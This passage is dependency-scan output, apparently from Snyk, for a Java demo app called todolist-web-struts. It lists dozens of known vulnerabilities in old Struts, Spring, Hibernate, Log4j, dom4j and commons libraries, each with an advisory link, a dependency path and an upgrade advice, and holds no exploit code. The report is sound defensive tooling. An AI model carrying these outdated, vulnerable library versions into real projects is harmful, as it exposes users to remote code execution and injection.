https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-72883 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-72884 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ Medium severity vulnerability found on com.fasterxml.jackson.core:jackson-core@2.6.5 +- desc: Denial of Service (DoS) +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31519 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-core@2.6.5 + + +✗ Medium severity vulnerability found on com.fasterxml.jackson.core:jackson-core@2.6.5 +- desc: Denial of Service (DoS) +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31520 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-core@2.6.5 + + +✗ Medium severity vulnerability found on commons-collections:commons-collections@3.1 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-472711 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > commons-collections:commons-collections@3.1 + + +✗ High severity vulnerability found on commons-fileupload:commons-fileupload@1.3.1 +- desc: Denial of Service (DoS) +- info: https://snyk.io/vuln/SNYK-JAVA-COMMONSFILEUPLOAD-30082 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.struts:struts2-core@2.3.20 > commons-fileupload:commons-fileupload@1.3.1 +Upgrade direct dependency org.apache.struts:struts2-core@2.3.20 to org.apache.struts:struts2-core@2.3.30 (triggers upgrades to commons-fileupload:commons-fileupload@1.3.2) + +✗ Medium severity vulnerability found on commons-fileupload:commons-fileupload@1.3.1 +- desc: Information Exposure +- info: https://snyk.io/vuln/SNYK-JAVA-COMMONSFILEUPLOAD-31540 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.struts:struts2-core@2.3.20 > commons-fileupload:commons-fileupload@1.3.1 +Upgrade direct dependency org.apache.struts:struts2-core@2.3.20 to org.apache.struts:struts2-core@2.3.30 (triggers upgrades to commons-fileupload:commons-fileupload@1.3.2) + +✗ Medium severity vulnerability found on commons-fileupload:commons-fileupload@1.3.1 +- desc: Denial of Service (DoS) +- info: https://snyk.io/vuln/SNYK-JAVA-COMMONSFILEUPLOAD-3326457 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.struts:struts2-core@2.3.20 > commons-fileupload:commons-fileupload@1.3.1 +Upgrade direct dependency org.apache.struts:struts2-core@2.3.20 to org.apache.struts:struts2-core@6.1.2 (triggers upgrades to commons-fileupload:commons-fileupload@1.5) + +✗ Medium severity vulnerability found on commons-io:commons-io@2.2 +- desc: Directory Traversal +- info: https://snyk.io/vuln/SNYK-JAVA-COMMONSIO-1277109 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.struts:struts2-core@2.3.20 > commons-io:commons-io@2.2 +Upgrade direct dependency org.apache.struts:struts2-core@2.3.20 to org.apache.struts:struts2-core@6.0.0 (triggers upgrades to commons-io:commons-io@2.9.0) + +✗ High severity vulnerability found on dom4j:dom4j@1.6.1 +- desc: XML External Entity (XXE) Injection +- info: https://snyk.io/vuln/SNYK-JAVA-DOM4J-174153 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > io.github.snyk:todolist-core@0.0.1-SNAPSHOT > org.hibernate:hibernate-core@4.3.7.Final > dom4j:dom4j@1.6.1 + + +✗ High severity vulnerability found on dom4j:dom4j@1.6.1 +- desc: XML External Entity (XXE) Injection +- info: https://snyk.io/vuln/SNYK-JAVA-DOM4J-2812975 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > io.github.snyk:todolist-core@0.0.1-SNAPSHOT > org.hibernate:hibernate-core@4.3.7.Final > dom4j:dom4j@1.6.1 + + +✗ High severity vulnerability found on javax.servlet:jstl@1.2 +- desc: XML External Entity (XXE) Injection +- info: https://snyk.io/vuln/SNYK-JAVA-JAVAXSERVLET-30449 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > javax.servlet:jstl@1.2 + + +✗ Medium severity vulnerability found on ognl:ognl@3.0.6 +- desc: Denial of Service (DoS) +- info: https://snyk.io/vuln/SNYK-JAVA-OGNL-30474 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.struts:struts2-core@2.3.20 > ognl:ognl@3.0.6 +Upgrade direct dependency org.apache.struts:struts2-core@2.3.20 to org.apache.struts:struts2-core@2.3.28 (triggers upgrades to ognl:ognl@3.0.13) + +✗ High severity vulnerability found on org.apache.logging.log4j:log4j-core@2.7 +- desc: Denial of Service (DoS) +- info: https://snyk.io/vuln/SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2321524 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.logging.log4j:log4j-core@2.7 +Upgrade direct dependency org.apache.logging.log4j:log4j-core@2.7 to org.apache.logging.log4j:log4j-core@2.12.3 + +✗ Medium severity vulnerability found on org.apache.logging.log4j:log4j-core@2.7 +- desc: Arbitrary Code Execution +- info: https://snyk.io/vuln/SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2327339 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.logging.log4j:log4j-core@2.7 +Upgrade direct dependency org.apache.logging.log4j:log4j-core@2.7 to org.apache.logging.log4j:log4j-core@2.12.4 + +✗ Low severity vulnerability found on org.apache.logging.log4j:log4j-core@2.7 +- desc: Man-in-the-Middle (MitM) +- info: https://snyk.io/vuln/SNYK-JAVA-ORGAPACHELOGGINGLOG4J-567761 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.logging.log4j:log4j-core@2.7 +Upgrade direct dependency org.apache.logging.log4j:log4j-core@2.7 to org.apache.logging.log4j:log4j-core@2.13.2 + +✗ High severity vulnerability found on org.apache.struts:struts2-core@2.3.20 +- desc: Remote Code Execution (RCE) +- info: https://snyk.io/vuln/SNYK-JAVA-ORGAPACHESTRUTS-2635340 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.struts:struts2-core@2.3.20 +Upgrade direct dependency org.apache.struts:struts2-core@2.3.20 to org.apache.struts:struts2-core@2.5.30 + +✗ High severity vulnerability found on org.apache.struts:struts2-core@2.3.20 +- desc: Manipulation of Struts' internals +- info: https://snyk.io/vuln/SNYK-JAVA-ORGAPACHESTRUTS-30060 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.struts:struts2-core@2.3.20 +Upgrade direct dependency org.apache.struts:struts2-core@2.3.20 to org.apache.struts:struts2-core@2.3.24.1 + +✗ High severity vulnerability found on org.apache.struts:struts2-core@2.3.20 +- desc: Command Injection +- info: https://snyk.io/vuln/SNYK-JAVA-ORGAPACHESTRUTS-30770 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.struts:struts2-core@2.3.20 +Upgrade direct dependency org.apache.struts:struts2-core@2.3.20 to org.apache.struts:struts2-core@2.3.20.3 + +✗ Medium severity vulnerability found on org.apache.struts:struts2-core@2.3.20 +- desc: Cross-site Scripting (XSS) +- info: https://snyk.io/vuln/SNYK-JAVA-ORGAPACHESTRUTS-30773 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.struts:struts2-core@2.3.20 +Upgrade direct dependency org.apache.struts:struts2-core@2.3.20 to org.apache.struts:struts2-core@2.3.28 + +✗ High severity vulnerability found on org.apache.struts:struts2-core@2.3.20 +- desc: Cross-site Request Forgery (CSRF) +- info: https://snyk.io/vuln/SNYK-JAVA-ORGAPACHESTRUTS-30774 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.struts:struts2-core@2.3.20 +Upgrade direct dependency org.apache.struts:struts2-core@2.3.20 to org.apache.struts:struts2-core@2.3.29 + +✗ High severity vulnerability found on org.apache.struts:struts2-core@2.3.20 +- desc: Access Restriction Bypass +- info: https://snyk.io/vuln/SNYK-JAVA-ORGAPACHESTRUTS-30775 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.struts:struts2-core@2.3.20 +Upgrade direct dependency org.apache.struts:struts2-core@2.3.20 to org.apache.struts:struts2-core@2.3.29 + +✗ High severity vulnerability found on org.apache.struts:struts2-core@2.3.20 +- desc: Access Restriction Bypass +- info: https://snyk.io/vuln/SNYK-JAVA-ORGAPACHESTRUTS-30776 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.struts:struts2-core@2.3.20 +Upgrade direct dependency org.apache.struts:struts2-core@2.3.20 to org.apache.struts:struts2-core@2.3.29 + +✗ High severity vulnerability found on org.apache.struts:struts2-core@2.3.20 +- desc: Arbitrary Command Execution +- info: https://snyk.io/vuln/SNYK-JAVA-ORGAPACHESTRUTS-31495 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.struts:struts2-core@2.3.20 +Upgrade direct dependency org.apache.struts:struts2-core@2.3.20 to org.apache.struts:struts2-core@2.3.34 + +✗ High severity vulnerability found on org.apache.struts:struts2-core@2.3.20 +- desc: Denial of Service (DoS) +- info: https://snyk.io/vuln/SNYK-JAVA-ORGAPACHESTRUTS-31500 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.struts:struts2-core@2.3.20 +Upgrade direct dependency org.apache.struts:struts2-core@2.3.20 to org.apache.struts:struts2-core@2.3.33 + +✗ High severity vulnerability found on org.apache.struts:struts2-core@2.3.20 +- desc: Denial of Service (DoS) +- info: https://snyk.io/vuln/SNYK-JAVA-ORGAPACHESTRUTS-31501 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.struts:struts2-core@2.3.20 +Upgrade direct dependency org.apache.struts:struts2-core@2.3.20 to org.apache.struts:struts2-core@2.3.34 + +✗ High severity vulnerability found on org.apache.struts:struts2-core@2.3.20 +- desc: Denial of Service (DoS) +- info: https://snyk.io/vuln/SNYK-JAVA-ORGAPACHESTRUTS-31502 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.struts:struts2-core@2.3.20 +Upgrade direct dependency org.apache.struts:struts2-core@2.3.20 to org.apache.struts:struts2-core@2.3.34 + +✗ High severity vulnerability found on org.apache.struts:struts2-core@2.3.20 +- desc: Remote Code Execution +- info: https://snyk.io/vuln/SNYK-JAVA-ORGAPACHESTRUTS-32477 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.struts:struts2-core@2.3.20 +Upgrade direct dependency org.apache.struts:struts2-core@2.3.20 to org.apache.struts:struts2-core@2.3.35 + +✗ Medium severity vulnerability found on org.apache.struts:struts2-core@2.3.20 +- desc: Regular Expression Denial of Service (ReDoS) +- info: https://snyk.io/vuln/SNYK-JAVA-ORGAPACHESTRUTS-460223 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.struts:struts2-core@2.3.20 +Upgrade direct dependency org.apache.struts:struts2-core@2.3.20 to org.apache.struts:struts2-core@2.3.29 + +✗ Medium severity vulnerability found on org.apache.struts:struts2-core@2.3.20 +- desc: Allocation of Resources Without Limits or Throttling +- info: https://snyk.io/vuln/SNYK-JAVA-ORGAPACHESTRUTS-5707101 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.struts:struts2-core@2.3.20 +Upgrade direct dependency org.apache.struts:struts2-core@2.3.20 to org.apache.struts:struts2-core@2.5.31 + +✗ High severity vulnerability found on org.apache.struts:struts2-core@2.3.20 +- desc: Denial of Service (DoS) +- info: https://snyk.io/vuln/SNYK-JAVA-ORGAPACHESTRUTS-608098 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.struts:struts2-core@2.3.20 +Upgrade direct dependency org.apache.struts:struts2-core@2.3.20 to org.apache.struts:struts2-core@2.5.22 + +✗ High severity vulnerability found on org.apache.struts:struts2-core@2.3.20 +- desc: Unrestricted Upload of File with Dangerous Type +- info: https://snyk.io/vuln/SNYK-JAVA-ORGAPACHESTRUTS-609765 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.struts:struts2-core@2.3.20 +Upgrade direct dependency org.apache.struts:struts2-core@2.3.20 to org.apache.struts:struts2-core@2.5 + +✗ Medium severity vulnerability found on org.apache.struts:struts2-core@2.3.20 +- desc: Denial of Service +- info: https://snyk.io/vuln/SNYK-JAVA-ORGAPACHESTRUTS-6100744 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.struts:struts2-core@2.3.20 +Upgrade direct dependency org.apache.struts:struts2-core@2.3.20 to org.apache.struts:struts2-core@2.5.32 + +✗ High severity vulnerability found on org.apache.struts.xwork:xwork-core@2.3.20 +- desc: Parameter Alteration +- info: https://snyk.io/vuln/SNYK-JAVA-ORGAPACHESTRUTSXWORK-30798 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.struts:struts2-core@2.3.20 > org.apache.struts.xwork:xwork-core@2.3.20 +Upgrade direct dependency org.apache.struts:struts2-core@2.3.20 to org.apache.struts:struts2-core@2.3.24.1 (triggers upgrades to org.apache.struts.xwork:xwork-core@2.3.24.1) + +✗ High severity vulnerability found on org.apache.struts.xwork:xwork-core@2.3.20 +- desc: Improper Input Validation +- info: https://snyk.io/vuln/SNYK-JAVA-ORGAPACHESTRUTSXWORK-30799 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.struts:struts2-core@2.3.20 > org.apache.struts.xwork:xwork-core@2.3.20 +Upgrade direct dependency org.apache.struts:struts2-core@2.3.20 to org.apache.struts:struts2-core@2.3.28 (triggers upgrades to org.apache.struts.xwork:xwork-core@2.3.28) + +✗ Medium severity vulnerability found on org.apache.struts.xwork:xwork-core@2.3.20 +- desc: Cross-site Scripting (XSS) +- info: https://snyk.io/vuln/SNYK-JAVA-ORGAPACHESTRUTSXWORK-30800 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.struts:struts2-core@2.3.20 > org.apache.struts.xwork:xwork-core@2.3.20 +Upgrade direct dependency org.apache.struts:struts2-core@2.3.20 to org.apache.struts:struts2-core@2.3.28 (triggers upgrades to org.apache.struts.xwork:xwork-core@2.3.28) + +✗ Medium severity vulnerability found on org.apache.struts.xwork:xwork-core@2.3.20 +- desc: Improper Input Validation +- info: https://snyk.io/vuln/SNYK-JAVA-ORGAPACHESTRUTSXWORK-30801 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.struts:struts2-core@2.3.20 > org.apache.struts.xwork:xwork-core@2.3.20 +Upgrade direct dependency org.apache.struts:struts2-core@2.3.20 to org.apache.struts:struts2-core@2.3.24.3 (triggers upgrades to org.apache.struts.xwork:xwork-core@2.3.24.3) + +✗ High severity vulnerability found on org.apache.struts.xwork:xwork-core@2.3.20 +- desc: Access Restriction Bypass +- info: https://snyk.io/vuln/SNYK-JAVA-ORGAPACHESTRUTSXWORK-30802 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.struts:struts2-core@2.3.20 > org.apache.struts.xwork:xwork-core@2.3.20 +Upgrade direct dependency org.apache.struts:struts2-core@2.3.20 to org.apache.struts:struts2-core@2.3.29 (triggers upgrades to org.apache.struts.xwork:xwork-core@2.3.29) + +✗ High severity vulnerability found on org.apache.struts.xwork:xwork-core@2.3.20 +- desc: Arbitrary Code Execution +- info: https://snyk.io/vuln/SNYK-JAVA-ORGAPACHESTRUTSXWORK-30803 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.struts:struts2-core@2.3.20 > org.apache.struts.xwork:xwork-core@2.3.20 +Upgrade direct dependency org.apache.struts:struts2-core@2.3.20 to org.apache.struts:struts2-core@2.3.29 (triggers upgrades to org.apache.struts.xwork:xwork-core@2.3.29) + +✗ Medium severity vulnerability found on org.apache.struts.xwork:xwork-core@2.3.20 +- desc: Regular Expression Denial of Service (ReDoS) +- info: https://snyk.io/vuln/SNYK-JAVA-ORGAPACHESTRUTSXWORK-30804 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.struts:struts2-core@2.3.20 > org.apache.struts.xwork:xwork-core@2.3.20 +Upgrade direct dependency org.apache.struts:struts2-core@2.3.20 to org.apache.struts:struts2-core@2.3.29 (triggers upgrades to org.apache.struts.xwork:xwork-core@2.3.29) + +✗ High severity vulnerability found on org.apache.struts.xwork:xwork-core@2.3.20 +- desc: Command Injection +- info: https://snyk.io/vuln/SNYK-JAVA-ORGAPACHESTRUTSXWORK-451611 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.struts:struts2-core@2.3.20 > org.apache.struts.xwork:xwork-core@2.3.20 +Upgrade direct dependency org.apache.struts:struts2-core@2.3.20 to org.apache.struts:struts2-core@2.3.20.3 (triggers upgrades to org.apache.struts.xwork:xwork-core@2.3.20.3) + +✗ High severity vulnerability found on org.apache.struts.xwork:xwork-core@2.3.20 +- desc: Insecure Defaults +- info: https://snyk.io/vuln/SNYK-JAVA-ORGAPACHESTRUTSXWORK-474418 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.struts:struts2-core@2.3.20 > org.apache.struts.xwork:xwork-core@2.3.20 +Upgrade direct dependency org.apache.struts:struts2-core@2.3.20 to org.apache.struts:struts2-core@2.3.20.1 (triggers upgrades to org.apache.struts.xwork:xwork-core@2.3.20.1) + +✗ High severity vulnerability found on org.apache.struts.xwork:xwork-core@2.3.20 +- desc: Improper Input Validation +- info: https://snyk.io/vuln/SNYK-JAVA-ORGAPACHESTRUTSXWORK-5811864 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.struts:struts2-core@2.3.20 > org.apache.struts.xwork:xwork-core@2.3.20 +Upgrade direct dependency org.apache.struts:struts2-core@2.3.20 to org.apache.struts:struts2-core@2.3.24.1 (triggers upgrades to org.apache.struts.xwork:xwork-core@2.3.24.1) + +✗ High severity vulnerability found on org.freemarker:freemarker@2.3.19 +- desc: Server-side Template Injection (SSTI) +- info: https://snyk.io/vuln/SNYK-JAVA-ORGFREEMARKER-1076795 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.apache.struts:struts2-core@2.3.20 > org.freemarker:freemarker@2.3.19 +Upgrade direct dependency org.apache.struts:struts2-core@2.3.20 to org.apache.struts:struts2-core@2.5.25 (triggers upgrades to org.freemarker:freemarker@2.3.30) + +✗ High severity vulnerability found on org.hibernate:hibernate-core@4.3.7.Final +- desc: SQL Injection +- info: https://snyk.io/vuln/SNYK-JAVA-ORGHIBERNATE-1041788 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > io.github.snyk:todolist-core@0.0.1-SNAPSHOT > org.hibernate:hibernate-core@4.3.7.Final + + +✗ High severity vulnerability found on org.hibernate:hibernate-core@4.3.7.Final +- desc: SQL Injection +- info: https://snyk.io/vuln/SNYK-JAVA-ORGHIBERNATE-584563 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > io.github.snyk:todolist-core@0.0.1-SNAPSHOT > org.hibernate:hibernate-core@4.3.7.Final + + +✗ Medium severity vulnerability found on org.hibernate:hibernate-validator@4.3.1.Final +- desc: JSM bypass via ReflectionHelper +- info: https://snyk.io/vuln/SNYK-JAVA-ORGHIBERNATE-30098 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > org.hibernate:hibernate-validator@4.3.1.Final + + +✗ Medium severity vulnerability found on org.hibernate:hibernate-validator@4.3.1.Final +- desc: Improper Input Validation +- info: https://snyk.io/vuln/SNYK-JAVA-ORGHIBERNATE-568162 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > org.hibernate:hibernate-validator@4.3.1.Final + + +✗ Medium severity vulnerability found on org.hibernate:hibernate-validator@4.3.1.Final +- desc: Cross-site Scripting (XSS) +- info: https://snyk.io/vuln/SNYK-JAVA-ORGHIBERNATE-569100 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > org.hibernate:hibernate-validator@4.3.1.Final + + +✗ High severity vulnerability found on org.hsqldb:hsqldb@2.3.2 +- desc: Remote Code Execution (RCE) +- info: https://snyk.io/vuln/SNYK-JAVA-ORGHSQLDB-3040860 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > io.github.snyk:todolist-core@0.0.1-SNAPSHOT > org.hsqldb:hsqldb@2.3.2 + + +✗ High severity vulnerability found on org.springframework:spring-web@3.2.6.RELEASE +- desc: Improper Input Validation +- info: https://snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-1009832 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.springframework:spring-web@3.2.6.RELEASE +Upgrade direct dependency org.springframework:spring-web@3.2.6.RELEASE to org.springframework:spring-web@4.3.29.RELEASE + +✗ High severity vulnerability found on org.springframework:spring-web@3.2.6.RELEASE +- desc: XML External Entity (XXE) Injection +- info: https://snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-30163 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.springframework:spring-web@3.2.6.RELEASE +Upgrade direct dependency org.springframework:spring-web@3.2.6.RELEASE to org.springframework:spring-web@3.2.9.RELEASE + +✗ Medium severity vulnerability found on org.springframework:spring-web@3.2.6.RELEASE +- desc: Denial of Service (DoS) +- info: https://snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-30164 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.springframework:spring-web@3.2.6.RELEASE +Upgrade direct dependency org.springframework:spring-web@3.2.6.RELEASE to org.springframework:spring-web@3.2.14.RELEASE + +✗ High severity vulnerability found on org.springframework:spring-web@3.2.6.RELEASE +- desc: Reflected File Download +- info: https://snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-30165 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.springframework:spring-web@3.2.6.RELEASE +Upgrade direct dependency org.springframework:spring-web@3.2.6.RELEASE to org.springframework:spring-web@3.2.15.RELEASE + +✗ Medium severity vulnerability found on org.springframework:spring-web@3.2.6.RELEASE +- desc: Cross-site Request Forgery (CSRF) +- info: https://snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-31331 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.springframework:spring-web@3.2.6.RELEASE +Upgrade direct dependency org.springframework:spring-web@3.2.6.RELEASE to org.springframework:spring-web@3.2.8.RELEASE + +✗ High severity vulnerability found on org.springframework:spring-web@3.2.6.RELEASE +- desc: Open Redirect +- info: https://snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-6261586 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.springframework:spring-web@3.2.6.RELEASE +Upgrade direct dependency org.springframework:spring-web@3.2.6.RELEASE to org.springframework:spring-web@5.3.32 + +✗ High severity vulnerability found on org.springframework:spring-web@3.2.6.RELEASE +- desc: Open Redirect +- info: https://snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-6444790 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.springframework:spring-web@3.2.6.RELEASE +Upgrade direct dependency org.springframework:spring-web@3.2.6.RELEASE to org.springframework:spring-web@5.3.33 + +✗ Medium severity vulnerability found on org.springframework:spring-web@3.2.6.RELEASE +- desc: Open Redirect +- info: https://snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-6597980 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.springframework:spring-web@3.2.6.RELEASE +Upgrade direct dependency org.springframework:spring-web@3.2.6.RELEASE to org.springframework:spring-web@5.3.34 + +✗ Medium severity vulnerability found on org.springframework:spring-core@3.2.6.RELEASE +- desc: Improper Output Neutralization for Logs +- info: https://snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-2329097 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.springframework:spring-web@3.2.6.RELEASE > org.springframework:spring-core@3.2.6.RELEASE +Upgrade direct dependency org.springframework:spring-web@3.2.6.RELEASE to org.springframework:spring-web@5.2.18.RELEASE (triggers upgrades to org.springframework:spring-core@5.2.18.RELEASE) + +✗ Medium severity vulnerability found on org.springframework:spring-core@3.2.6.RELEASE +- desc: Improper Input Validation +- info: https://snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-2330878 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.springframework:spring-web@3.2.6.RELEASE > org.springframework:spring-core@3.2.6.RELEASE +Upgrade direct dependency org.springframework:spring-web@3.2.6.RELEASE to org.springframework:spring-web@5.2.19.RELEASE (triggers upgrades to org.springframework:spring-core@5.2.19.RELEASE) + +✗ Medium severity vulnerability found on org.springframework:spring-core@3.2.6.RELEASE +- desc: Directory Traversal +- info: https://snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-31325 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.springframework:spring-web@3.2.6.RELEASE > org.springframework:spring-core@3.2.6.RELEASE +Upgrade direct dependency org.springframework:spring-web@3.2.6.RELEASE to org.springframework:spring-web@3.2.9.RELEASE (triggers upgrades to org.springframework:spring-core@3.2.9.RELEASE) + +✗ Medium severity vulnerability found on org.springframework:spring-expression@3.2.6.RELEASE +- desc: Denial of Service (DoS) +- info: https://snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-2434828 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.springframework:spring-web@3.2.6.RELEASE > org.springframework:spring-context@3.2.6.RELEASE > org.springframework:spring-expression@3.2.6.RELEASE +Upgrade direct dependency org.springframework:spring-web@3.2.6.RELEASE to org.springframework:spring-web@5.0.0.RELEASE + +✗ Medium severity vulnerability found on org.springframework:spring-expression@3.2.6.RELEASE +- desc: Allocation of Resources Without Limits or Throttling +- info: https://snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-3369749 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.springframework:spring-web@3.2.6.RELEASE > org.springframework:spring-context@3.2.6.RELEASE > org.springframework:spring-expression@3.2.6.RELEASE +Upgrade direct dependency org.springframework:spring-web@3.2.6.RELEASE to org.springframework:spring-web@5.0.0.RELEASE + +✗ Medium severity vulnerability found on org.springframework:spring-expression@3.2.6.RELEASE +- desc: Allocation of Resources Without Limits or Throttling +- info: https://snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-5422217 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.springframework:spring-web@3.2.6.RELEASE > org.springframework:spring-context@3.2.6.RELEASE > org.springframework:spring-expression@3.2.6.RELEASE +Upgrade direct dependency org.springframework:spring-web@3.2.6.RELEASE to org.springframework:spring-web@5.0.0.RELEASE + +✗ Medium severity vulnerability found on org.springframework:spring-beans@3.2.6.RELEASE +- desc: Denial of Service (DoS) +- info: https://snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-2823313 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.springframework:spring-web@3.2.6.RELEASE > org.springframework:spring-beans@3.2.6.RELEASE +Upgrade direct dependency org.springframework:spring-web@3.2.6.RELEASE to org.springframework:spring-web@5.2.22.RELEASE (triggers upgrades to org.springframework:spring-beans@5.2.22.RELEASE) + +✗ Low severity vulnerability found on org.springframework:spring-context@3.2.6.RELEASE +- desc: Improper Handling of Case Sensitivity +- info: https://snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-2689634 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.springframework:spring-web@3.2.6.RELEASE > org.springframework:spring-context@3.2.6.RELEASE +Upgrade direct dependency org.springframework:spring-web@3.2.6.RELEASE to org.springframework:spring-web@5.0.0.RELEASE + +✗ Medium severity vulnerability found on org.zeroturnaround:zt-zip@1.12 +- desc: Arbitrary File Write via Archive Extraction (Zip Slip) +- info: https://snyk.io/vuln/SNYK-JAVA-ORGZEROTURNAROUND-31681 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > 